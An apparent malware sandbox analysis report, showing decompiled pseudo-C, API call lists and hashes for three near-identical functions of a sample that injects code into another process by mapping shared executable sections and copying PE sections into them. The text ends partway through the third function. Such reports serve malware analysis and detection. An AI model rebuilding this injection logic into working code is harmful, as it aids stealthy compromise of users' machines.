                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: aa239b2ee7b7a1a0b3ffb45dfca917dbddb9bacbaae0f77fc96c0f4f43538294
                    • Instruction ID: 875affe5b8015aa942028eb222aca49a3761eb159d59d404aa124f65acbec2ce
                    • Opcode Fuzzy Hash: aa239b2ee7b7a1a0b3ffb45dfca917dbddb9bacbaae0f77fc96c0f4f43538294
                    • Instruction Fuzzy Hash: 83511B74900249BFEB208F91CC89FEFBBB8EF85B10F104159F951AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040145D Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 164 40145d-401482 call 401134 171 401484 164->171 172 401487-40148c 164->172 171->172 174 4017b2-4017ba 172->174 175 401492-4014a3 172->175 174->172 178 4017b0-4017d3 175->178 179 4014a9-4014d2 175->179 186 4017e5 178->186 179->178 187 4014d8-4014ef NtDuplicateObject 179->187 187->178 188 4014f5-401519 NtCreateSection 187->188 191 401575-40159b NtCreateSection 188->191 192 40151b-40153c NtMapViewOfSection 188->192 191->178 195 4015a1-4015a5 191->195 192->191 194 40153e-40155a NtMapViewOfSection 192->194 194->191 196 40155c-401572 194->196 195->178 197 4015ab-4015cc NtMapViewOfSection 195->197 196->191 197->178 198 4015d2-4015ee NtMapViewOfSection 197->198 198->178 200 4015f4 call 4015f9 198->200
                    C-Code - Quality: 57%
                    			E0040145D(void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr* _t108;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				long* _t130;
				signed int _t137;
				int _t138;
				intOrPtr _t155;
				void* _t160;
				intOrPtr* _t161;
				void* _t164;
				long _t172;
				intOrPtr _t174;
				void* _t175;
				long* _t180;
				intOrPtr* _t182;
				HANDLE* _t183;
				HANDLE* _t184;
				void* _t189;
				void* _t190;
				intOrPtr* _t193;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t200;
				void* _t202;
				intOrPtr* _t203;
				long _t221;
				void* _t227;

				asm("outsd");
				E00401134(_t84, __edi, __eflags, _t227);
				_t126 =  *((intOrPtr*)(_t198 + 8));
				_t172 = 0;
				 *((intOrPtr*)(_t198 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t198 - 0x34)) =  *((intOrPtr*)(_t198 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t198 - 0x5c)) = _t87;
				_t180 = _t198 - 0x60;
				 *_t180 = _t172;
				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t130 = _t198 - 0x30;
					 *_t130 = _t90;
					_t130[1] = _t172;
					_t182 = _t198 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t182, 0x18);
					 *_t182 = 0x18;
					_push(_t198 - 0x30);
					_push(_t182);
					_push(0x40);
					_push(_t198 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t198 - 0x10), 0xffffffff, 0xffffffff, _t198 - 0xc, _t172, _t172, 2) == 0) {
						 *(_t198 - 8) = _t172;
						_t98 = _t198 - 0x50;
						 *(_t98 + 4) = _t172;
						 *_t98 = 0x5000;
						_t183 = _t198 - 0x54;
						if(NtCreateSection(_t183, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
							 *_t25 =  *(_t198 - 0x50);
							_t120 = _t198 - 0x44;
							 *_t120 = _t172;
							if(NtMapViewOfSection( *_t183, 0xffffffff, _t120, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
								_t122 = _t198 - 0x3c;
								 *_t122 = _t172;
								if(NtMapViewOfSection( *_t183,  *(_t198 - 0xc), _t122, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
									_t197 =  *(_t198 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t172, _t197, 0x104);
									 *((intOrPtr*)(_t197 + 0x208)) =  *((intOrPtr*)(_t198 + 0x14));
									 *(_t198 - 8) =  *(_t198 - 8) + 1;
								}
							}
						}
						_t100 = _t198 - 0x50;
						 *(_t100 + 4) = _t172;
						 *_t100 =  *((intOrPtr*)(_t198 + 0x10)) + 0x10000;
						_t184 = _t198 - 0x58;
						if(NtCreateSection(_t184, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 &&  *(_t198 - 8) != 0) {
							 *_t46 =  *(_t198 - 0x50);
							_t102 = _t198 - 0x48;
							 *_t102 = _t172;
							if(NtMapViewOfSection( *_t184, 0xffffffff, _t102, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
								_t104 = _t198 - 0x40;
								 *_t104 = _t172;
								_t221 = NtMapViewOfSection( *_t184,  *(_t198 - 0xc), _t104, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 0x20);
								if(_t221 == 0) {
									L19();
									if(_t221 == 0 && _t221 != 0) {
										asm("xlatb");
										asm("rcl dword [ebx], 0x8b");
									}
									_t202 = _t200 + 4;
									_push(0x2eb0);
									_t203 = _t202 + 4;
									_push(0x2260);
									_t155 =  *_t203;
									_push(_t155);
									asm("lodsb");
									asm("loop 0xffffffc9");
									_t189 =  *((intOrPtr*)(_t198 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xc))));
									_t137 =  *(_t189 + 6) & 0x0000ffff;
									_push(_t189);
									_t160 = _t189;
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_t161 = _t160 + 0xf8;
										__eflags = _t161;
									} else {
										_t161 = _t160 + 0x108;
									}
									_push(_t137);
									_t138 =  *(_t161 + 0x10);
									if(_t138 != 0) {
										memcpy( *((intOrPtr*)(_t161 + 0xc)) +  *(_t198 - 0x48),  *((intOrPtr*)(_t161 + 0x14)) +  *((intOrPtr*)(_t198 + 0xc)), _t138);
									}
									asm("loop 0xffffffe6");
									_pop(_t190);
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_push(_t190);
										_t164 =  *((intOrPtr*)(_t190 + 0x34)) -  *(_t198 - 0x40);
										_t193 =  *((intOrPtr*)(_t190 + 0xa0)) +  *(_t198 - 0x48);
										__eflags = _t193;
										while(1) {
											__eflags =  *_t193;
											if( *_t193 == 0) {
												break;
											}
											_t174 =  *_t193;
											_t193 = _t193 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
												__eflags =  *((intOrPtr*)(0 +  *(_t198 - 0x48) + _t174));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t194);
										_t172 = 0;
										__eflags = 0;
										_t108 = _t198 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t126 + 0x98))( *(_t198 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t194 + 0x28)) +  *(_t198 - 0x40),  *(_t198 - 0x3c), _t108, 0);
									} else {
										L52();
										_pop(_t175);
										_t172 = _t175 - 0x16ee;
										 *((intOrPtr*)(_t172 + 0x1722)) = _t172 + 0x2bbb;
										L004011C3();
										0x33(_t172 + 0x2bbb, 0x1ad);
										 *((intOrPtr*)(_t172 + 0x1747)) = _t172 + 0x2c0b;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x1474;
				_push(0x379);
			}








































                    0x0040145d
                    0x0040146f
                    0x00401474
                    0x00401477
                    0x00401479
                    0x00401482
                    0x00401484
                    0x00401484
                    0x00401487
                    0x00401487
                    0x0040148c
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017b7
                    0x00401492
                    0x00401495
                    0x00401498
                    0x0040149c
                    0x0040149f
                    0x004014a3
                    0x004014a9
                    0x004014ac
                    0x004014ae
                    0x004014b1
                    0x004014b7
                    0x004014ba
                    0x004014c8
                    0x004014c9
                    0x004014ca
                    0x004014cc
                    0x004014d2
                    0x004014f5
                    0x004014f8
                    0x004014fb
                    0x004014fe
                    0x00401504
                    0x00401519
                    0x0040151e
                    0x00401521
                    0x00401524
                    0x0040153c
                    0x0040153e
                    0x00401541
                    0x0040155a
                    0x0040155c
                    0x00401566
                    0x0040156c
                    0x00401572
                    0x00401572
                    0x0040155a
                    0x0040153c
                    0x00401575
                    0x00401581
                    0x00401584
                    0x00401586
                    0x0040159b
                    0x004015ae
                    0x004015b1
                    0x004015b4
                    0x004015cc
                    0x004015d2
                    0x004015d5
                    0x004015ec
                    0x004015ee
                    0x004015f4
                    0x004015f9
                    0x004015fd
                    0x004015fe
                    0x004015fe
                    0x00401603
                    0x00401628
                    0x00401630
                    0x00401642
                    0x00401647
                    0x00401659
                    0x0040167e
                    0x0040168b
                    0x004016a9
                    0x004016ab
                    0x004016af
                    0x004016b0
                    0x004016b6
                    0x004016c0
                    0x004016c0
                    0x004016b8
                    0x004016b8
                    0x004016b8
                    0x004016c6
                    0x004016c7
                    0x004016cc
                    0x004016da
                    0x004016da
                    0x004016e0
                    0x004016e2
                    0x004016e7
                    0x0040174f
                    0x00401753
                    0x0040175e
                    0x0040175e
                    0x00401761
                    0x00401761
                    0x00401764
                    0x00000000
                    0x00000000
                    0x00401766
                    0x00401770
                    0x00401775
                    0x00401777
                    0x0040177c
                    0x00401788
                    0x00401788
                    0x00401788
                    0x0040178a
                    0x0040178a
                    0x0040178e
                    0x00401795
                    0x00401795
                    0x00401797
                    0x0040179a
                    0x004017aa
                    0x004016e9
                    0x004016e9
                    0x004016ee
                    0x004016ef
                    0x00401705
                    0x00401714
                    0x00401721
                    0x00401738
                    0x00401746
                    0x00401746
                    0x004016e7
                    0x004015ee
                    0x004015cc
                    0x0040159b
                    0x004014d2
                    0x004017cb
                    0x004017db

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: c777d85a313d6204129e744fdb44d59ecbedb6b98fa3d971b816145188cb92c2
                    • Instruction ID: 64f050098b634efaf460332bf9a79526af7b9d542430e692bb7884b77a16f5e9
                    • Opcode Fuzzy Hash: c777d85a313d6204129e744fdb44d59ecbedb6b98fa3d971b816145188cb92c2
                    • Instruction Fuzzy Hash: C551FA75900249BFEB208F91CC89FAF7BB8FF85B10F104159FA11AA2A5D7749945CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401460 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 202 401460-401482 call 401134 206 401484 202->206 207 401487-40148c 202->207 206->207 209 4017b2-4017ba 207->209 210 401492-4014a3 207->210 209->207 213 4017b0-4017d3 210->213 214 4014a9-4014d2 210->214 221 4017e5 213->221 214->213 222 4014d8-4014ef NtDuplicateObject 214->222 222->213 223 4014f5-401519 NtCreateSection 222->223 226 401575-40159b NtCreateSection 223->226 227 40151b-40153c NtMapViewOfSection 223->227 226->213 230 4015a1-4015a5 226->230 227->226 229 40153e-40155a NtMapViewOfSection 227->229 229->226 231 40155c-401572 229->231 230->213 232 4015ab-4015cc NtMapViewOfSection 230->232 231->226 232->213 233 4015d2-4015ee NtMapViewOfSection 232->233 233->213 235 4015f4 call 4015f9 233->235
                    C-Code - Quality: 59%
                    			E00401460(signed int __eax, void* __edi) {
				intOrPtr _t88;
				long _t91;
				void* _t92;
				struct _GUID _t99;
				struct _GUID _t101;
				PVOID* _t103;
				PVOID* _t105;
				intOrPtr* _t109;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				long* _t132;
				signed int _t139;
				int _t140;
				intOrPtr _t157;
				void* _t162;
				intOrPtr* _t163;
				void* _t166;
				long _t174;
				intOrPtr _t176;
				void* _t177;
				long* _t182;
				intOrPtr* _t184;
				HANDLE* _t185;
				HANDLE* _t186;
				void* _t191;
				void* _t192;
				intOrPtr* _t195;
				void* _t196;
				void* _t199;
				void* _t200;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				signed char _t209;
				long _t223;
				void* _t229;

				_t85 = __eax | 0x00000076;
				_t209 = __eax | 0x00000076;
				E00401134(_t85, __edi, _t209, _t229);
				_t127 =  *((intOrPtr*)(_t200 + 8));
				_t174 = 0;
				 *((intOrPtr*)(_t200 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t200 - 0x34)) =  *((intOrPtr*)(_t200 - 0x34)) + 1;
				}
				while(1) {
					_t88 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t88 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t200 - 0x5c)) = _t88;
				_t182 = _t200 - 0x60;
				 *_t182 = _t174;
				 *((intOrPtr*)(_t127 + 0x4c))(_t88, _t182);
				_t91 =  *_t182;
				if(_t91 != 0) {
					_t132 = _t200 - 0x30;
					 *_t132 = _t91;
					_t132[1] = _t174;
					_t184 = _t200 - 0x28;
					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
					 *_t184 = 0x18;
					_push(_t200 - 0x30);
					_push(_t184);
					_push(0x40);
					_push(_t200 - 0x10);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t200 - 0x10), 0xffffffff, 0xffffffff, _t200 - 0xc, _t174, _t174, 2) == 0) {
						 *(_t200 - 8) = _t174;
						_t99 = _t200 - 0x50;
						 *(_t99 + 4) = _t174;
						 *_t99 = 0x5000;
						_t185 = _t200 - 0x54;
						if(NtCreateSection(_t185, 6, _t174, _t99, 4, 0x8000000, _t174) == 0) {
							 *_t25 =  *(_t200 - 0x50);
							_t121 = _t200 - 0x44;
							 *_t121 = _t174;
							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
								_t123 = _t200 - 0x3c;
								 *_t123 = _t174;
								if(NtMapViewOfSection( *_t185,  *(_t200 - 0xc), _t123, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
									_t199 =  *(_t200 - 0x44);
									 *((intOrPtr*)(_t127 + 0x20))(_t174, _t199, 0x104);
									 *((intOrPtr*)(_t199 + 0x208)) =  *((intOrPtr*)(_t200 + 0x14));
									 *(_t200 - 8) =  *(_t200 - 8) + 1;
								}
							}
						}
						_t101 = _t200 - 0x50;
						 *(_t101 + 4) = _t174;
						 *_t101 =  *((intOrPtr*)(_t200 + 0x10)) + 0x10000;
						_t186 = _t200 - 0x58;
						if(NtCreateSection(_t186, 0xe, _t174, _t101, 0x40, 0x8000000, _t174) == 0 &&  *(_t200 - 8) != 0) {
							 *_t46 =  *(_t200 - 0x50);
							_t103 = _t200 - 0x48;
							 *_t103 = _t174;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t103, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 4) == 0) {
								_t105 = _t200 - 0x40;
								 *_t105 = _t174;
								_t223 = NtMapViewOfSection( *_t186,  *(_t200 - 0xc), _t105, _t174, _t174, _t174, _t200 - 0x38, 1, _t174, 0x20);
								if(_t223 == 0) {
									L17();
									if(_t223 == 0 && _t223 != 0) {
										asm("xlatb");
										asm("rcl dword [ebx], 0x8b");
									}
									_t204 = _t202 + 4;
									_push(0x2eb0);
									_t205 = _t204 + 4;
									_push(0x2260);
									_t157 =  *_t205;
									_push(_t157);
									asm("lodsb");
									asm("loop 0xffffffc9");
									_t191 =  *((intOrPtr*)(_t200 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc))));
									_t139 =  *(_t191 + 6) & 0x0000ffff;
									_push(_t191);
									_t162 = _t191;
									if( *((intOrPtr*)(_t200 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t200 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t200 + 0xc)), _t140);
									}
									asm("loop 0xffffffe6");
									_pop(_t192);
									if( *((intOrPtr*)(_t200 - 0x34)) == 0) {
										_push(_t192);
										_t166 =  *((intOrPtr*)(_t192 + 0x34)) -  *(_t200 - 0x40);
										_t195 =  *((intOrPtr*)(_t192 + 0xa0)) +  *(_t200 - 0x48);
										__eflags = _t195;
										while(1) {
											__eflags =  *_t195;
											if( *_t195 == 0) {
												break;
											}
											_t176 =  *_t195;
											_t195 = _t195 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
												__eflags =  *((intOrPtr*)(0 +  *(_t200 - 0x48) + _t176));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t196);
										_t174 = 0;
										__eflags = 0;
										_t109 = _t200 - 4;
										 *_t109 = 0;
										 *((intOrPtr*)(_t127 + 0x98))( *(_t200 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t196 + 0x28)) +  *(_t200 - 0x40),  *(_t200 - 0x3c), _t109, 0);
									} else {
										L50();
										_pop(_t177);
										_t174 = _t177 - 0x16ee;
										 *((intOrPtr*)(_t174 + 0x1722)) = _t174 + 0x2bbb;
										L004011C3();
										0x33(_t174 + 0x2bbb, 0x1ad);
										 *((intOrPtr*)(_t174 + 0x1747)) = _t174 + 0x2c0b;
										0x33();
									}
								}
							}
						}
					}
				}
				_t92 = 0x1474;
				_push(0x379);
			}








































                    0x00401460
                    0x00401460
                    0x0040146f
                    0x00401474
                    0x00401477
                    0x00401479
                    0x00401482
                    0x00401484
                    0x00401484
                    0x00401487
                    0x00401487
                    0x0040148c
                    0x00000000
                    0x00000000
                    0x004017b7
                    0x004017b7
                    0x00401492
                    0x00401495
                    0x00401498
                    0x0040149c
                    0x0040149f
                    0x004014a3
                    0x004014a9
                    0x004014ac
                    0x004014ae
                    0x004014b1
                    0x004014b7
                    0x004014ba
                    0x004014c8
                    0x004014c9
                    0x004014ca
                    0x004014cc
                    0x004014d2
                    0x004014f5
                    0x004014f8
                    0x004014fb
                    0x004014fe
                    0x00401504
                    0x00401519
                    0x0040151e
                    0x00401521
                    0x00401524
                    0x0040153c
                    0x0040153e
                    0x00401541
                    0x0040155a
                    0x0040155c
                    0x00401566
                    0x0040156c
                    0x00401572
                    0x00401572
                    0x0040155a
                    0x0040153c
                    0x00401575
                    0x00401581
                    0x00401584
                    0x00401586
                    0x0040159b
                    0x004015ae
                    0x004015b1
                    0x004015b4
                    0x004015cc
                    0x004015d2
                    0x004015d5
                    0x004015ec
                    0x004015ee
                    0x004015f4
                    0x004015f9
                    0x004015fd
                    0x004015fe
                    0x004015fe
                    0x00401603
                    0x00401628
                    0x00401630
                    0x00401642
                    0x00401647
                    0x00401659
                    0x0040167e
                    0x0040168b
                    0x004016a9
                    0x004016ab
                    0x004016af
                    0x004016b0
                    0x004016b6
                    0x004016c0
                    0x004016c0
                    0x004016b8
                    0x004016b8
                    0x004016b8
                    0x004016c6
                    0x004016c7
                    0x004016cc
                    0x004016da
                    0x004016da
                    0x004016e0
                    0x004016e2
                    0x004016e7
                    0x0040174f
                    0x00401753
                    0x0040175e
                    0x0040175e
                    0x00401761
                    0x00401761
                    0x00401764
                    0x00000000
                    0x00000000
                    0x00401766
                    0x00401770
                    0x00401775
                    0x00401777
                    0x0040177c
                    0x00401788
                    0x00401788
                    0x00401788
                    0x0040178a
                    0x0040178a
                    0x0040178e
                    0x00401795
                    0x00401795
                    0x00401797
                    0x0040179a
                    0x004017aa
                    0x004016e9
                    0x004016e9
                    0x004016ee
                    0x004016ef
                    0x00401705
                    0x00401714
                    0x00401721
                    0x00401738
                    0x00401746
                    0x00401746
                    0x004016e7
                    0x004015ee
                    0x004015cc
                    0x0040159b
                    0x004014d2
                    0x004017cb
                    0x004017db

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: 6009193819dd22e85f5db9aefac48bd8857ccca130184f1ff84ad04c18ecb97b
                    • Instruction ID: 0eb640bdefb12f4d8d79d21e94fd48f192c5c8138051fc39ed52ff1756291963
                    • Opcode Fuzzy Hash: 6009193819dd22e85f5db9aefac48bd8857ccca130184f1ff84ad04c18ecb97b
                    • Instruction Fuzzy Hash: 5D511A75900249BFEF208F91CC89FEF7BB8EF85710F104159FA11AA2A5D7709944CB24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040146B Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 237 40146b-401482 call 401134 243 401484 237->243 244 401487-40148c 237->244 243->244 246 4017b2-4017ba 244->246 247 401492-4014a3 244->247 246->244 250 4017b0-4017d3 247->250 251 4014a9-4014d2 247->251 258 4017e5 250->258 251->250 259 4014d8-4014ef NtDuplicateObject 251->259 259->250 260 4014f5-401519 NtCreateSection 259->260 263 401575-40159b NtCreateSection 260->263 264 40151b-40153c NtMapViewOfSection 260->264 263->250 267 4015a1-4015a5 263->267 264->263 266 40153e-40155a NtMapViewOfSection 264->266 266->263 268 40155c-401572 266->268 267->250 269 4015ab-4015cc NtMapViewOfSection 267->269 268->263 269->250 270 4015d2-4015ee NtMapViewOfSection 269->270 270->250 272 4015f4 call 4015f9 270->272
                    C-Code - Quality: 57%
                    			E0040146B(void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr* _t108;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				long* _t130;
				signed int _t137;
				int _t138;
				intOrPtr _t155;
				void* _t160;
				intOrPtr* _t161;
				void* _t164;
				long _t172;
				intOrPtr _t174;
				void* _t175;
				long* _t180;
				intOrPtr* _t182;
				HANDLE* _t183;
				HANDLE* _t184;
				void* _t189;
				void* _t190;
				intOrPtr* _t193;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t200;
				void* _t202;
				intOrPtr* _t203;
				long _t221;
				void* _t227;

				asm("pushfd");
				E00401134(_t84, __edi, __eflags, _t227);
				_t126 =  *((intOrPtr*)(_t198 + 8));
				_t172 = 0;
				 *((intOrPtr*)(_t198 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t198 - 0x34)) =  *((intOrPtr*)(_t198 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t198 - 0x5c)) = _t87;
				_t180 = _t198 - 0x60;
				 *_t180 = _t172;
				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t130 = _t198 - 0x30;
					 *_t130 = _t90;
					_t130[1] = _t172;
					_t182 = _t198 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t182, 0x18);
					 *_t182 = 0x18;
					_push(_t198 - 0x30);
					_push(_t182);
					_push(0x40);
					_push(_t198 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t198 - 0x10), 0xffffffff, 0xffffffff, _t198 - 0xc, _t172, _t172, 2) == 0) {
						 *(_t198 - 8) = _t172;
						_t98 = _t198 - 0x50;
						 *(_t98 + 4) = _t172;
						 *_t98 = 0x5000;
						_t183 = _t198 - 0x54;
						if(NtCreateSection(_t183, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
							 *_t25 =  *(_t198 - 0x50);
							_t120 = _t198 - 0x44;
							 *_t120 = _t172;
							if(NtMapViewOfSection( *_t183, 0xffffffff, _t120, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
								_t122 = _t198 - 0x3c;
								 *_t122 = _t172;
								if(NtMapViewOfSection( *_t183,  *(_t198 - 0xc), _t122, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
									_t197 =  *(_t198 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t172, _t197, 0x104);
									 *((intOrPtr*)(_t197 + 0x208)) =  *((intOrPtr*)(_t198 + 0x14));
									 *(_t198 - 8) =  *(_t198 - 8) + 1;
								}
							}
						}
						_t100 = _t198 - 0x50;
						 *(_t100 + 4) = _t172;
						 *_t100 =  *((intOrPtr*)(_t198 + 0x10)) + 0x10000;
						_t184 = _t198 - 0x58;
						if(NtCreateSection(_t184, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 &&  *(_t198 - 8) != 0) {
							 *_t46 =  *(_t198 - 0x50);
							_t102 = _t198 - 0x48;
							 *_t102 = _t172;
							if(NtMapViewOfSection( *_t184, 0xffffffff, _t102, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 4) == 0) {
								_t104 = _t198 - 0x40;
								 *_t104 = _t172;
								_t221 = NtMapViewOfSection( *_t184,  *(_t198 - 0xc), _t104, _t172, _t172, _t172, _t198 - 0x38, 1, _t172, 0x20);
								if(_t221 == 0) {
									L18();
									if(_t221 == 0 && _t221 != 0) {
										asm("xlatb");
										asm("rcl dword [ebx], 0x8b");
									}
									_t202 = _t200 + 4;
									_push(0x2eb0);
									_t203 = _t202 + 4;
									_push(0x2260);
									_t155 =  *_t203;
									_push(_t155);
									asm("lodsb");
									asm("loop 0xffffffc9");
									_t189 =  *((intOrPtr*)(_t198 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xc))));
									_t137 =  *(_t189 + 6) & 0x0000ffff;
									_push(_t189);
									_t160 = _t189;
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_t161 = _t160 + 0xf8;
										__eflags = _t161;
									} else {
										_t161 = _t160 + 0x108;
									}
									_push(_t137);
									_t138 =  *(_t161 + 0x10);
									if(_t138 != 0) {
										memcpy( *((intOrPtr*)(_t161 + 0xc)) +  *(_t198 - 0x48),  *((intOrPtr*)(_t161 + 0x14)) +  *((intOrPtr*)(_t198 + 0xc)), _t138);
									}
									asm("loop 0xffffffe6");
									_pop(_t190);
									if( *((intOrPtr*)(_t198 - 0x34)) == 0) {
										_push(_t190);
										_t164 =  *((intOrPtr*)(_t190 + 0x34)) -  *(_t198 - 0x40);
										_t193 =  *((intOrPtr*)(_t190 + 0xa0)) +  *(_t198 - 0x48);
										__eflags = _t193;
										while(1) {
											__eflags =  *_t193;
											if( *_t193 == 0) {
